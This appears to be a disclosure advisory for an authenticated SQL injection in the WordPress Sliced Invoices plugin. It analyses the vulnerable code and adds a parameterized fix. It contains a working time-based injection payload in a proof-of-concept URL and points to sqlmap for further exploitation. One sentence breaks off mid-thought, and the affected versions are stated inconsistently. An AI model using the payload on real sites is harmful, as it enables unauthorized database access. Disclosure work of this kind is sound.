Wordpress Sliced Invoices plugin with a version lower than 3.8.2 is affected by an Authenticated SQL Injection vulnerability. Note that this vulnerability is highly similar to Wordpress Sliced Invoices <= 3.8.2 Authenticated Reflected XSS, since both stem from the same GET parameter.
Initial submission of the vulnerability
# Exploit Title: Wordpress Sliced Invoices <= 3.8.2 Authenticated SQL Injection Vulnerability
# Date: 22-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://slicedinvoices.com/
# Software Link: https://wordpress.org/plugins/sliced-invoices/
# Version: 3.8.2
# Tested on: Ubuntu 18.04 / Wordpress 5.3

1. Description:

Wordpress Sliced Invoices plugin with a version lower than 3.8.2 is affected by an Authenticated SQL Injection vulnerability.

2. Proof of Concept:

Authenticated SQL Injection:

- Using a WordPress user, access <your target>/wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
- The response will be returned after 20 seconds, proving successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.
Detailed analysis of the vulnerability
In wp-content/plugins/sliced-invoices/admin/class-sliced-admin.php at line number 2202 we can observe a non-parameterized query passed to $wpdb->get_results() with user-supplied data interpolated directly into the SQL string:

$post_meta_infos = $wpdb->get_results("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");
$post_id variable is assigned on line
/*
 * get the original post id
 */
$post_id = (isset($_GET['post']) ? $_GET['post'] : $_POST['post']);
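To make the defect concrete, here is the unsafe pattern described above next to a parameterized version, as an added example rather than the plugin's own code. It assumes the standard WordPress $wpdb object (get_results() and prepare()) and the absint() helper; the function names are hypothetical.

```php
<?php
// Added example, not the Sliced Invoices plugin's code. Assumes the WordPress
// $wpdb API (get_results(), prepare()) and absint(); function names are made up.

// Vulnerable shape: $post_id is taken straight from the request and concatenated
// into the SQL string, so a value such as "8 and (select ...)" runs as SQL.
function sliced_example_copy_meta_unsafe() {
    global $wpdb;
    $post_id = ( isset( $_GET['post'] ) ? $_GET['post'] : $_POST['post'] );
    return $wpdb->get_results(
        "SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id"
    );
}

// Hardened shape: the value is coerced to a non-negative integer and bound with
// $wpdb->prepare(), so the request can only choose a post id, never alter the query.
function sliced_example_copy_meta_safe() {
    global $wpdb;
    $raw     = isset( $_GET['post'] ) ? $_GET['post']
             : ( isset( $_POST['post'] ) ? $_POST['post'] : 0 );
    $post_id = absint( $raw );   // "8 and (select ...)" is reduced to 8
    if ( 0 === $post_id ) {
        return array();          // no valid post id supplied, nothing to read
    }
    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT meta_key, meta_value FROM {$wpdb->postmeta} WHERE post_id = %d",
            $post_id
        )
    );
}
```

The %d placeholder and absint() together guarantee the bound value is an integer; combined with a capability and nonce check on the duplicate action, this closes the injection regardless of how the parameter arrives.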
This vulnerability could be easily exploited by accessing
example.com is your target. To retrieve more data you can use the sqlmap tool over the affected target URL.
How to fix
Update to the latest available version of the Sliced Invoices plugin.
- Exploit Database: https://www.exploit-db.com/exploits/47540
- Packet Storm: https://packetstormsecurity.com/files/154953/WordPress-Sliced-Invoices-3.8.2-SQL-Injection.html